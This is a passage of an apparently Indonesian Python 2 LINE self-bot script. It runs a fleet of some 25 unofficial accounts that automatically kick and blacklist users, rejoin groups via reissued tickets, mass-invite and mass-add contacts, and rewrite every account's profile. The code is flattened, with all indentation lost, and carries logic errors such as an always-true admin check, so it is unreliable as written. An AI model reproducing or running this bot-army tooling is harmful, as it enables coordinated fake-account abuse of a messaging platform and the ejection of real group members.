k12.kickoutFromGroup(op.param1,[op.param2])
k13.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k12.getGroup(op.param1)
G.preventJoinByTicket = False
k12.updateGroup(G)
Ti = k12.reissueGroupTicket(op.param1)
k11.acceptGroupInvitationByTicket(op.param1,Ti)
X = k11.getGroup(op.param1)
X.preventJoinByTicket = True
k11.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Pmid in op.param3:
if op.param2 in Bots:
pass
try:
k13.kickoutFromGroup(op.param1,[op.param2])
k14.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k13.getGroup(op.param1)
G.preventJoinByTicket = False
k13.updateGroup(G)
Ti = k13.reissueGroupTicket(op.param1)
k12.acceptGroupInvitationByTicket(op.param1,Ti)
X = k12.getGroup(op.param1)
X.preventJoinByTicket = True
k12.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Qmid in op.param3:
if op.param2 in Bots:
pass
try:
k14.kickoutFromGroup(op.param1,[op.param2])
k15.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k14.getGroup(op.param1)
G.preventJoinByTicket = False
k14.updateGroup(G)
Ti = k14.reissueGroupTicket(op.param1)
k13.acceptGroupInvitationByTicket(op.param1,Ti)
X = k13.getGroup(op.param1)
X.preventJoinByTicket = True
k13.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Rmid in op.param3:
if op.param2 in Bots:
pass
try:
k15.kickoutFromGroup(op.param1,[op.param2])
k16.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k15.getGroup(op.param1)
G.preventJoinByTicket = False
k15.updateGroup(G)
Ti = k15.reissueGroupTicket(op.param1)
k14.acceptGroupInvitationByTicket(op.param1,Ti)
X = k14.getGroup(op.param1)
X.preventJoinByTicket = True
k14.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Smid in op.param3:
if op.param2 in Bots:
pass
try:
k16.kickoutFromGroup(op.param1,[op.param2])
k17.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k16.getGroup(op.param1)
G.preventJoinByTicket = False
k16.updateGroup(G)
Ti = k16.reissueGroupTicket(op.param1)
k15.acceptGroupInvitationByTicket(op.param1,Ti)
X = k15.getGroup(op.param1)
X.preventJoinByTicket = True
k15.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Tmid in op.param3:
if op.param2 in Bots:
pass
try:
k17.kickoutFromGroup(op.param1,[op.param2])
k18.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k17.getGroup(op.param1)
G.preventJoinByTicket = False
k17.updateGroup(G)
Ti = k17.reissueGroupTicket(op.param1)
k16.acceptGroupInvitationByTicket(op.param1,Ti)
X = k16.getGroup(op.param1)
X.preventJoinByTicket = True
k16.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Umid in op.param3:
if op.param2 in Bots:
pass
try:
k18.kickoutFromGroup(op.param1,[op.param2])
k19.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k18.getGroup(op.param1)
G.preventJoinByTicket = False
k18.updateGroup(G)
Ti = k18.reissueGroupTicket(op.param1)
k17.acceptGroupInvitationByTicket(op.param1,Ti)
X = k17.getGroup(op.param1)
X.preventJoinByTicket = True
k17.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Vmid in op.param3:
if op.param2 in Bots:
pass
try:
k19.kickoutFromGroup(op.param1,[op.param2])
k20.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k19.getGroup(op.param1)
G.preventJoinByTicket = False
k19.updateGroup(G)
Ti = k19.reissueGroupTicket(op.param1)
k18.acceptGroupInvitationByTicket(op.param1,Ti)
X = k18.getGroup(op.param1)
X.preventJoinByTicket = True
k18.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Wmid in op.param3:
if op.param2 in Bots:
pass
try:
k20.kickoutFromGroup(op.param1,[op.param2])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k20.getGroup(op.param1)
G.preventJoinByTicket = False
k20.updateGroup(G)
Ti = k20.reissueGroupTicket(op.param1)
k19.acceptGroupInvitationByTicket(op.param1,Ti)
X = k19.getGroup(op.param1)
X.preventJoinByTicket = True
k19.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Xmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
k20.acceptGroupInvitationByTicket(op.param1,Ti)
G = k20.getGroup(op.param1)
G.preventJoinByTicket = True
k20.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------------------------------
if op.type == 19:
if op.param2 not in Bots:
if op.param3 in admin or owner:
if op.param2 not in Bots:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param2 not in Bots:
if op.param3 in admin or owner:
if op.param2 not in Bots:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
k1.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param2 not in Bots:
if op.param3 in mid:
if op.param2 not in Bots:
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(DEF).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(DEF).updateGroup(G)
Ticket = random.choice(DEF).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
G = random.choice(DEF).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(DEF).updateGroup(G)
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
#-----------------------------------------------
if op.type == 19:
if op.param2 not in Bots:
if op.param3 in Bots:
if op.param2 not in Bots:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
ks.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k1.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k2.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k3.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k4.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k5.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k6.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k7.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k8.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k9.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k10.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k11.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k12.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k13.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k14.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k15.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k16.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k17.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k18.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k19.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k20.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
ks.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k1.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k2.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k3.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k4.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k5.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k6.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k7.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k8.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k9.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k10.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k11.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k12.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k13.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k14.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k15.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k16.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k17.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k18.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k19.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
k20.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.001)
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
#--------------------------------
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
ks.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
ks.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
ks.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
ks.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
ks.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
ks.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Key","key"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,Keyowner)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Mimin","mimin"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
#===========================================
#---------------------
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "|============================|\n Selamat Datang Di " + str(ginfo.name) + "\n|============================|\n" + " Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName + "\n|============================|\n" + " ??Semoga Betah Kak ?? \n|============================|\n No Baper,No nakal,No Ngeyel ya..!! \n|============================|")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "|============================|\n Baper Tuh Orang :v \n|============================|\n Belum di Anu Kayanya ?? \n|============================|")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n?Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n?" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite2"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = random.choice(KAC).getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
random.choice(KAC).sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
random.choice(KAC).sendText(msg.to,"Sorry, " + _name + " On Blacklist")
random.choice(KAC).sendText(msg.to,"Call my owner to use command !, \n?Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
random.choice(KAC).findAndAddContactsByMid(target)
random.choice(KAC).inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Selesai di Invite : \n?" + _name)
wait["winvite2"] = False
break
except:
try:
random.choice(KAC).findAndAddContactsByMid(invite)
random.choice(KAC).inviteIntoGroup(op.param1,[invite])
wait["winvite2"] = False
except:
random.choice(KAC).sendText(msg.to,"Error Boss, di tunggu beberapa saat lagi boss")
wait["winvite2"] = False
break
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
gs = k6.getGroup(msg.to)
gs = k7.getGroup(msg.to)
gs = k8.getGroup(msg.to)
gs = k9.getGroup(msg.to)
gs = k10.getGroup(msg.to)
gs = k11.getGroup(msg.to)
gs = k12.getGroup(msg.to)
gs = k13.getGroup(msg.to)
gs = k14.getGroup(msg.to)
gs = k15.getGroup(msg.to)
gs = k16.getGroup(msg.to)
gs = k17.getGroup(msg.to)
gs = k18.getGroup(msg.to)
gs = k19.getGroup(msg.to)
gs = k20.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
gs = k6.getGroup(msg.to)
gs = k7.getGroup(msg.to)
gs = k8.getGroup(msg.to)
gs = k9.getGroup(msg.to)
gs = k10.getGroup(msg.to)
gs = k11.getGroup(msg.to)
gs = k12.getGroup(msg.to)
gs = k13.getGroup(msg.to)
gs = k14.getGroup(msg.to)
gs = k15.getGroup(msg.to)
gs = k16.getGroup(msg.to)
gs = k17.getGroup(msg.to)
gs = k18.getGroup(msg.to)
gs = k19.getGroup(msg.to)
gs = k20.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "||Admin ? t?a? c????-a??? ??t ?||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in owner:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
gs = k6.getGroup(msg.to)
gs = k7.getGroup(msg.to)
gs = k8.getGroup(msg.to)
gs = k9.getGroup(msg.to)
gs = k10.getGroup(msg.to)
gs = k11.getGroup(msg.to)
gs = k12.getGroup(msg.to)
gs = k13.getGroup(msg.to)
gs = k14.getGroup(msg.to)
gs = k15.getGroup(msg.to)
gs = k16.getGroup(msg.to)
gs = k17.getGroup(msg.to)
gs = k18.getGroup(msg.to)
gs = k19.getGroup(msg.to)
gs = k20.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
k1.findAndAddContactsByMid(target)
k2.findAndAddContactsByMid(target)
k3.findAndAddContactsByMid(target)
k4.findAndAddContactsByMid(target)
k5.findAndAddContactsByMid(target)
k6.findAndAddContactsByMid(target)
k7.findAndAddContactsByMid(target)
k8.findAndAddContactsByMid(target)
k9.findAndAddContactsByMid(target)
k10.findAndAddContactsByMid(target)
k11.findAndAddContactsByMid(target)
k12.findAndAddContactsByMid(target)
k13.findAndAddContactsByMid(target)
k14.findAndAddContactsByMid(target)
k15.findAndAddContactsByMid(target)
k16.findAndAddContactsByMid(target)
k17.findAndAddContactsByMid(target)
k18.findAndAddContactsByMid(target)
k19.findAndAddContactsByMid(target)
k20.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
#-------------=SC AllBio=---------------- Ganti Bio Semua Bot Format => Allbio: SUKA SUKA KALIAN :D
elif "Allbio:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k1.getProfile()
profile.statusMessage = string
k1.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k2.getProfile()
profile.statusMessage = string
k2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k3.getProfile()
profile.statusMessage = string
k3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k4.getProfile()
profile.statusMessage = string
k4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k5.getProfile()
profile.statusMessage = string
k5.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k6.getProfile()
profile.statusMessage = string
k6.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k7.getProfile()
profile.statusMessage = string
k7.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k8.getProfile()
profile.statusMessage = string
k8.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k9.getProfile()
profile.statusMessage = string
k9.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k10.getProfile()
profile.statusMessage = string
k10.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k11.getProfile()
